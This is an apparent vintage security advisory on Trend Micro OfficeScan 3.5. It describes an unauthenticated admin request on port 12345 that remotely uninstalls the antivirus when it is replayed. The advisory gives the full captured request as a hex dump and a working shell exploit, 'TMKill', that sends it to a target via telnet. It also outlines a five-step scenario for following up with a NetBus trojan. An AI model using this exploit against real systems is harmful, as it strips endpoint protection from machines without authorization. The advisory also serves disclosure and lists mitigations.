COMMAND
OfficeScan
SYSTEMS AFFECTED
TendMicro OfficeScan 3.5
PROBLEM
Gregory Duchemin found following. He tried something new with
the anti-viral agent listening on the port 12345. First, he
sniffed an admin request from the web-based centralized server
toward the target. This request is in the http/1.0 protocol, so
in a human readable form. This is an example of such a tracked
request with the help of the very cool buttsniffer (BO plug-in):
Source IP: x.x.x.x Target IP: x.x.x.x
TCP Length: 533 Source Port: 1241 Target Port: 12345 Seq: 00815779
Ack: 01263158
Flags: PA Window: 8760 TCP ChkSum: 7159 UrgPtr: 0
00000000: 47 45 54 20 2F 3F 30 35 36 38 30 46 35 34 35 45 GET
/?05680F545E
00000010: 38 38 41 45 44 35 33 39 32 42 38 38 35 45 45 37
88AED5392B885EE7
00000020: 31 34 32 44 38 42 42 46 38 45 33 35 32 36 39 33
142D8BBF8E352693
00000030: 37 32 35 34 33 30 44 43 31 45 37 46 39 35 34 46
725430DC1E7F954F
00000040: 42 33 34 35 46 45 38 39 39 46 30 31 32 30 33 42
B345FE899F01203B
00000050: 32 32 32 43 46 41 46 38 42 30 35 43 41 35 44 39
222CFAF8B05CA5D9
00000060: 30 43 46 35 44 45 45 37 33 38 31 30 32 41 42 31
0CF5DEE738102AB1
00000070: 43 41 45 45 45 36 32 46 37 46 34 41 41 33 36 45
CAEEE62F7F4AA36E
00000080: 43 44 32 30 43 42 35 45 41 44 45 43 32 43 35 34
CD20CB5EADEC2C54
00000090: 37 37 36 36 35 30 44 35 35 35 41 39 34 31 35 42
776650D555A9415B
000000A0: 45 35 33 34 38 45 37 46 30 30 46 39 38 31 41 35
E5348E7F00F981A5
000000B0: 44 42 45 45 31 46 33 41 42 33 30 46 41 42 43 34
DBEE1F3AB30FABC4
000000C0: 33 33 32 33 30 46 36 36 42 34 39 39 38 32 46 44
33230F66B49982FD
000000D0: 41 35 46 30 37 37 44 30 37 41 46 37 32 31 43 44
A5F077D07AF721CD
000000E0: 37 39 31 38 41 35 35 38 30 43 33 33 31 42 43 34
7918A5580C331BC4
000000F0: 43 32 41 39 35 39 42 46 36 33 34 31 31 32 42 34
C2A959BF634112B4
00000100: 46 39 41 39 33 39 35 33 42 38 46 36 34 42 30 32
F9A93953B8F64B02
00000110: 43 38 38 31 45 44 36 43 35 35 42 46 43 44 36 32
C881ED6C55BFCD62
00000120: 30 35 36 31 33 34 42 42 46 38 30 30 37 45 46 46
056134BBF8007EFF
00000130: 42 36 36 34 33 35 31 38 31 41 37 37 36 32 45 45
B66435181A7762EE
00000140: 30 32 42 38 39 31 33 46 35 34 35 44 32 35 31 31
02B8913F545D2511
00000150: 38 39 37 43 38 39 38 46 33 45 35 33 42 42 38 44
897C898F3E53BB8D
00000160: 34 46 34 45 43 37 31 45 37 46 41 43 36 44 38 45
4F4EC71E7FAC6D8E
00000170: 32 36 44 33 45 35 35 41 39 41 37 43 31 45 42 39
26D3E55A9A7C1EB9
00000180: 36 42 44 46 44 32 42 45 38 34 34 46 43 35 45 43
6BDFD2BE844FC5EC
00000190: 36 35 44 41 46 36 43 37 31 43 30 32 39 34 32 41
65DAF6C71C02942A
000001A0: 39 32 42 42 39 37 38 41 43 38 37 35 31 32 30 32
92BB978AC8751202
000001B0: 43 35 30 45 45 34 30 34 34 35 44 44 36 43 44 31
C50EE40445DD6CD1
000001C0: 31 43 45 31 31 41 39 39 30 34 20 48 54 54 50 2F 1CE11A9904
HTTP/
000001D0: 31 2E 30 0D 0A 48 6F 73 74 3A 20 31 30 2E 31 2E 1.0..Host:
x.x.x.x
000001E0: 36 2E 39 34 3A 31 32 33 34 35 0D 0A 55 73 65 72
:12345..User
000001F0: 2D 41 67 65 6E 74 3A 20 4F 66 66 69 63 65 53 63 -Agent:
OfficeSc
00000200: 61 6E 2F 33 2E 35 0D 0A 41 63 63 65 70 74 3A 20
an/3.5..Accept:
00000210: 2A 2F 2A 0D 0A */*..
Note the very big ascii string behind the default html document.
This string means in this case: "remote un-installation of
TrendMicro product"! So Gregory replaid the same request toward
another client with success. Few seconds later, this workstation
didn't have no longer OfficeScan installed on it. The product was
removed from the hard disk on the target system.
That attack was conducted against a windows NT 4.0 SP5 OfficeScan
3.5, since the problem relies in a protocol layer not in the
system involved, others system like windows 9.X et windows 3.x
should be infected too.
So, a malicious user is able to remotly suppress every OfficeScan
inside the company network (stealing the admin priviledge) without
any authentication just because, this authentication is only used
to launch the manager not to sign or crypt the paquets. Because
the manager is used to do other administration task, it may be
possible to upload a zero length signature file, for example. A
dark scenario may be this one, in five steps:
1- the malicious user inject a bad signature file to all the
PC
2- then he send his trojanned mail (with a netbus attached) to
every users
3- after a good time drinking his cola, he starts netbus
client and look for all the possibly infected stations
4- because 12345 is the netbus port too, admins should not
understand immediatly that they r under attack
5- the attacker start his bad job
Gregory wrote a little exploit too:
#!/bin/sh
#
# Usage: TMKill target_ip
# gdn@neurocom.com ( Gregory Duchemin )
#
(
sleep 2
echo "GET
/?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F
01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776
650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721C
D7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF80
07EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A
9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11C
E11A9904 HTTP/1.0"
echo "Host:"$1":12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept:*/*"
echo
sleep 10
)| telnet $1 12345 2>&1 | tee -a ./log.txt
SOLUTION
Solutions:
1- contact TrendMicro
2- close the 12345 port of all the stations, stop the service
TMlisten in the services menu ( NT ), no more network
upgrade till TrendMicro will give us a patch
3- install sniffers all over the network to track possible
attackers